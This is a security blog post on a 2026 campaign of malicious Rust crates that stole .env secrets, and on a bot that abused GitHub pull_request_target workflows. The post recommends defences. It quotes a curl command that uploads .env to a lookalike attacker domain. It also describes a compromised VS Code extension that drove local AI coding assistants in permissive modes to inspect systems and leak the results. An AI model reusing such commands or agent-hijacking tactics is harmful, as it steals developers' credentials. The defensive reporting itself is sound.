Commissioned, Curated and Published by Russ. Researched and written with AI.
What’s New
Socket’s Threat Research Team confirmed all five malicious crates have been removed from crates.io and the publisher account suspended. The Trivy VS Code extension compromise (CVE-2026-28353) has been patched – versions 1.8.12 and 1.8.13 from Open VSX are the affected artifacts. Aqua Security has revoked the tokens used to publish them. If you run open source repos, the pull_request_target audit is the most urgent action item right now.
Changelog
| Date | Summary |
|---|---|
| 11 Mar 2026 | Initial publication covering the five malicious Rust crates and the hackerbot-claw GitHub Actions campaign. |
In February 2026, someone published five Rust crates to crates.io. They were framed as time utilities – local time calibration without NTP, useful for constrained networks and CI environments. They were not time utilities. They were credential theft tools, and they ran against developer machines and CI pipelines every time someone called them.
Socket’s Threat Research Team caught the campaign. The crates are gone. But the attack surface that made this possible is still there, and it’s not specific to Rust.
The Crates Campaign
The five packages – chrono_anchor, dnp3times, time_calibrator, time_calibrators, and time-sync – were published between late February and early March 2026. Socket assessed with high confidence that all five came from the same threat actor, based on shared infrastructure, identical exfiltration logic, and a lookalike domain: timeapis[.]io, impersonating the legitimate timeapi.io service.
Four of the crates were straightforward: find the .env file, POST it to the attacker’s server via curl, done. No persistence, no complex exploitation. Just curl -F [email protected] http://timeapis.io/... fired in a background thread.
chrono_anchor was more considered. The exfiltration logic lived inside guard.rs, invoked from what looked like routine parameter validation. The crate first sent a legitimate HTTPS request to timeapi.io as cover traffic – making it look like a genuine time check – then quietly downgraded to HTTP and POSTed the .env file to the lookalike domain. One character difference in the hostname. One letter appended. The kind of thing that doesn’t jump out in a quick review.
The crates were framed around a plausible use case. “Local time calibration without NTP” is a real problem in restricted network environments. That framing lowered reviewer scepticism. chrono_anchor borrowed from the widely-used chrono ecosystem name; dnp3times typosquatted the legitimate dnp3time crate. These are standard supply chain attack techniques, now applied to the Rust ecosystem.
time_calibrators was removed about three hours after publication. time-sync lasted roughly fifty minutes. chrono_anchor survived longest, until Socket identified and reported it. The crates.io security team yanked it and suspended the publishing account.
Sixty-six downloads of chrono_anchor before removal. We don’t know how many of those ran in CI.
The GitHub Actions Attack
Running alongside the crates campaign – attributed to the same period but a separate operation – was hackerbot-claw. An AI-powered bot that targeted open source CI/CD pipelines.
Between February 21 and February 28, 2026, the GitHub account (which described itself as an “autonomous security research agent”) targeted at least seven repositories belonging to Microsoft, Datadog, Aqua Security, and others. The attack chain: scan public repositories for misconfigured GitHub Actions workflows, fork the target repo, open a pull request with a trivial-looking change, trigger CI, steal secrets.
The specific misconfiguration it hunted was pull_request_target.
Here’s why that trigger is a problem. GitHub Actions has two relevant triggers for pull requests: pull_request and pull_request_target. The pull_request trigger runs in the context of the fork – it gets read-only access and no repository secrets. That’s the safe one.
pull_request_target runs in the context of the base repository. It has write permissions. It has access to repository secrets. It exists because there’s a legitimate need: running a full test suite on community PRs without requiring fork contributors to have repository secrets. But the documented risk is that if the workflow executes code from the PR under pull_request_target, that code runs with the base repository’s credentials.
Hackerbot-claw exploited this directly. The most high-profile target was aquasecurity/trivy, a popular open source security scanner. StepSecurity documented the attack: the bot submitted a PR with a concealed malicious payload (hidden in branch names, filenames, or CI scripts alongside a trivial visible change), the pull_request_target workflow triggered on the PR, and the bot’s code executed with repository write access. The stolen Personal Access Token was then used to push a malicious version of Trivy’s VS Code extension to the Open VSX registry.
That extension – versions 1.8.12 and 1.8.13 – then weaponised local AI coding assistants. It ran Claude, Codex, Gemini, GitHub Copilot CLI, and Kiro CLI in permissive modes, instructed them to perform system inspection, and exfiltrated the results using the victim’s own authenticated GitHub CLI session. The attack vector adapted mid-campaign: version 1.8.12 scattered output to random channels with no reliable collection mechanism; 1.8.13 fixed that by using the victim’s own GitHub account as the exfiltration channel. Iteration. The attacker was debugging their own malware.
Aqua has since revoked the tokens, removed the artifacts, and issued CVE-2026-28353. If you installed those extension versions from Open VSX, remove them now and rotate your environment secrets.
.env as Universal Target
The crates didn’t target a specific secret. They targeted .env. That’s the whole attack.
.env files are how modern development teams handle secrets at the edges of their workflows. API keys, database passwords, cloud provider credentials, GitHub tokens, registry tokens. Excluded from version control, present everywhere else: local dev environments, CI runners, staging boxes. The dotenv convention is simple, portable, and ubiquitous.
That ubiquity is the attack surface. A malicious dependency doesn’t need to know what secrets you have. It just needs to upload .env and let the attacker sort through it. Low complexity, high yield.
The crates didn’t establish persistence. They didn’t install services or scheduled tasks. They didn’t need to. Every time the affected code path ran – during development, during CI, during testing – the crate attempted to exfiltrate secrets again. In a CI environment that runs on every commit, that’s a lot of attempts.
Treat .env files the way you’d treat a private key file. Scope them aggressively. Consider secret managers (AWS Secrets Manager, HashiCorp Vault, GitHub Secrets) for CI workloads rather than .env files on disk. At minimum, ensure CI runners can’t make arbitrary outbound network requests – the curl call in these crates would have been stopped cold by proper egress filtering.
The AI-PR Normalisation Problem
The fact that hackerbot-claw submitted AI-generated PRs designed to look like genuine contributions is the new element worth sitting with.
Open source maintainers have always reviewed incoming PRs for obvious malice. A PR that adds a typo fix in the README while hiding a payload in a CI script is a social engineering attack on reviewer attention. Maintainers scan for suspicious changes. They’re less likely to scrutinise a diff that looks like a normal community contribution.
AI-generated PRs that mimic legitimate contributions raise the baseline difficulty of that review. If the visible change looks genuine – correct code style, reasonable commit message, coherent PR description – it requires active adversarial thinking to catch the embedded payload. Pillar Security assessed hackerbot-claw as a human operator using an LLM as an execution layer, not a fully autonomous agent. But the effect is the same: the friction between “spot the malicious PR” and “merge the community contribution” has decreased.
This is the supply chain attack updated for an era where AI-generated code is normal. Reviewers will increasingly need to treat PR review as a security control, not just a quality control – especially for CI workflow changes. A PR that touches .github/workflows/ should get more scrutiny than one that updates docs, regardless of how legitimate it looks.
See also: the AI clinejection attack on supply chains, and CI/CD privilege separation for the structural mitigations.
What to Do Today
Check your Cargo.lock right now. Search for chrono_anchor, dnp3times, time_calibrator, time_calibrators, time-sync. If any are present, assume possible exfiltration and rotate any secrets that existed in .env files in that project’s working directory.
Audit every GitHub Actions workflow using pull_request_target. Run this across your repositories:
grep -r "pull_request_target" .github/workflows/
For each match: does the workflow execute code from the PR? If yes, it’s vulnerable. The fix is to switch to pull_request for fork PRs, which runs in the fork context without repository secrets. If you need pull_request_target for a legitimate reason (e.g., leaving comments on PRs that require write access), make sure no untrusted code from the PR branch executes in that workflow.
Run cargo-audit in CI. It checks your dependencies against the RustSec advisory database, which now includes all five of these crates. cargo-deny provides broader policy enforcement, including license and source allowlists. Both should be standard practice for any Rust project. Neither is optional in 2026.
Rotate PATs and secrets if any repo had pull_request_target workflows that accepted external PRs in the last month. Assume compromise, rotate, verify.
Restrict outbound network access in CI. The crate exfiltration relied on curl making HTTP requests to an external domain. Egress filtering in CI runners stops this class of attack regardless of what the dependency does. If your build process doesn’t need to reach timeapis.io, it shouldn’t be able to.
Consider cargo-vet for high-trust supply chain requirements. It requires explicit human audits of crate code before use. More friction, but the right friction for security-sensitive or regulated environments.
Closing
Rust’s safety reputation is real and earned. The borrow checker, the absence of memory corruption classes, the type system – these make real security differences. None of that applies to what your dependencies do when they execute.
crates.io has no mandatory code review before publication. There’s no publisher verification beyond email. There’s no automated malware scanning at publication time. npm has been attacked this way for years, and the Rust ecosystem has largely watched from a safe distance. This campaign confirms that safety is over. The supply chain doesn’t care what language you’re using.
Memory safety and supply chain security are different attack surfaces. Treating one as a proxy for the other is how you end up exfiltrating your own AWS keys to a lookalike domain because you added a time utility to your Cargo.toml.